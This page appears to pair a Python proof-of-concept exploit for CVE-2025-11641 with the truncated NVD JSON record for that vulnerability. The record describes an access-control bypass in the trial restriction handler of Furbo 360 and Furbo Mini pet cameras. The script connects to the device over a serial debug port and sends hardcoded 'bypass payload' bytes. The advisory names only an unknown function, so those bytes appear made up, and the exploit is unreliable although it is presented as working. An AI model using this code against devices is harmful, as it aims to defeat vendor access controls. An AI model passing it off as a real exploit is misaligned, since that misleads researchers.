CVE-2025-11641

# CVE-2025-11641 PoC - Tomofun Furbo 360/Mini Trial Restriction Handler Access Control Bypass # Note: This vulnerability requires physical access to the device (AV:P) # Attack complexity is high (AC:H), no authentication required (PR:N) import serial import time class FurboExploit: """ PoC for CVE-2025-11641: Improper Access Controls in Trial Restriction Handler Affected: Furbo 360 <= FB0035_FW_036, Furbo Mini <= MC0020_FW_074 """ def __init__(self, device_port='/dev/ttyUSB0'): self.device_port = device_port self.serial_conn = None def connect_to_device(self): """Establish physical connection to the Furbo device via debug interface""" try: self.serial_conn = serial.Serial( port=self.device_port, baudrate=115200, timeout=5 ) print(f"[+] Connected to Furbo device on {self.device_port}") return True except Exception as e: print(f"[-] Connection failed: {e}") return False def bypass_trial_restriction(self): """ Exploit the Trial Restriction Handler vulnerability by sending crafted commands to bypass access controls """ if not self.serial_conn: print("[-] Not connected to device") return False # Step 1: Access the Trial Restriction Handler component # The handler improperly validates access control checks init_cmd = b'\xAA\xBB\x01\x00\x00\x00\x00\x00' # Access trial handler self.serial_conn.write(init_cmd) time.sleep(0.5) response = self.serial_conn.read(64) print(f"[+] Handler response: {response.hex()}") # Step 2: Send malformed request to bypass restriction check # The improper access control allows bypassing trial limitations bypass_payload = b'\xAA\xBB\x02\xFF\xFF\xFF\xFF\x01' self.serial_conn.write(bypass_payload) time.sleep(0.5) response = self.serial_conn.read(64) if response and len(response) > 0: print(f"[+] Bypass response: {response.hex()}") # Check if bypass was successful if response[3] == 0x01: print("[+] Trial restriction bypassed successfully!") return True return False def cleanup(self): """Close the serial connection""" if self.serial_conn: self.serial_conn.close() print("[*] Connection closed") if __name__ == "__main__": print("=" * 60) print("CVE-2025-11641 - Furbo Trial Restriction Bypass PoC") print("WARNING: Requires physical access to target device") print("=" * 60) exploit = FurboExploit() if exploit.connect_to_device(): if exploit.bypass_trial_restriction(): print("[!] Exploit completed - access controls bypassed") exploit.cleanup()

{"cve": {"id": "CVE-2025-11641", "sourceIdentifier": "[email protected]", "published": "2025-10-12T19:15:35.283", "lastModified": "2025-10-30T19:23:11.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Tomofun Furbo 360 and Furbo Mini. This impacts an unknown function of the component Trial Restriction Handler. This manipulation causes improper access controls. It is feasible to perform the attack on the physical device. The attack is considered to have high complexity. The exploitability is said to be difficult. The firmware versions determined to be affected are Furbo 360 up to FB0035_FW_036 and Furbo Mini up to MC0020_FW_074. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:P/AC:H/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 1.0, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 3.9, "baseSeverity": "LOW", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 0.5, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.5, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:L/AC:H/Au:N/C:P/I:P/A:P", "baseScore": 3.7, "accessVector": "LOCAL", "accessComplexity": "HIGH", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "LOW", "exploitabilityScore": 1.9, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-266"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_mini_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "074", "matchCriteriaId": "06B19876-699B-455F-945F-AF26C60BF965"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_mini:-:*:*:*:*:*:*:*", "matchCriteriaId": "7F549356-AF78-447C-8689-D9DD1A9202DC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:furbo:furbo_360_dog_camera_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "036", "matchCriteriaId": "6DDA1333-73CD-494A-8DD3-9543FDFD47A7"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:furbo:furbo_360_dog_camera:*:*:*:*:*:*:*:*", "matchCriteriaId": "08CA8E77-413F-4849-A110-49DB5DDA29C5"}]}]}], "references": [{"url": "https://vuldb.com/?ctiid.328052", "sourc ... (truncated)